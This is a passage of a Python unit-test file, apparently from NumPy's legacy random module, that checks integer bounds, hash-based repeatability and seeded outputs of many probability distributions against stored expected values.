ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
# We use an md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are computed for little-endian byte order.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
@pytest.mark.skipif(np.iinfo('l').max < 2**32,
reason='Cannot test with 32-bit C long')
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[3992670689, 2438360420, 2557845020],
[4107320065, 4142558326, 3216529513],
[1605979228, 2807061240, 665605495]],
[[3211410639, 4128781000, 457175120],
[1712592594, 1282922662, 3081439808],
[3997822960, 2008322436, 1563495165]],
[[1398375547, 4269260146, 115316740],
[3414372578, 3437564012, 2112038651],
[3572980305, 2260248732, 3908238631]],
[[2561372503, 223155946, 3127879445],
[ 441282060, 3514786552, 2148440361],
[1629275283, 3479737011, 3003195987]],
[[ 412181688, 940383289, 3047321305],
[2978368172, 764731833, 2282559898],
[ 105711276, 720447391, 3596512484]]])
for size in [None, (5, 3, 3)]:
random.seed(12345)
x = self.rfunc([[-1], [0], [1]], [2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.seed(self.seed)
actual = random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.seed(self.seed)
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.seed(self.seed)
actual = random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_randint(self):
random.seed(self.seed)
actual = random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(int).max == 2147483647:
desired = np.array([[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889]], dtype=np.int64)
else:
desired = np.array([[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332]],
dtype=np.int64)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype('l').type
actual = random.random_integers(typer(np.iinfo('l').max),
typer(np.iinfo('l').max))
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
non_contig = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_bytes(self):
random.seed(self.seed)
actual = random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
random.seed(self.seed)
bad_x_str = "abcd"
assert_raises(IndexError, random.permutation, bad_x_str)
random.seed(self.seed)
bad_x_float = 1.2
assert_raises(IndexError, random.permutation, bad_x_float)
integer_val = 10
desired = [9, 0, 8, 5, 1, 3, 4, 7, 6, 2]
random.seed(self.seed)
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, .456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random.seed(self.seed)
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
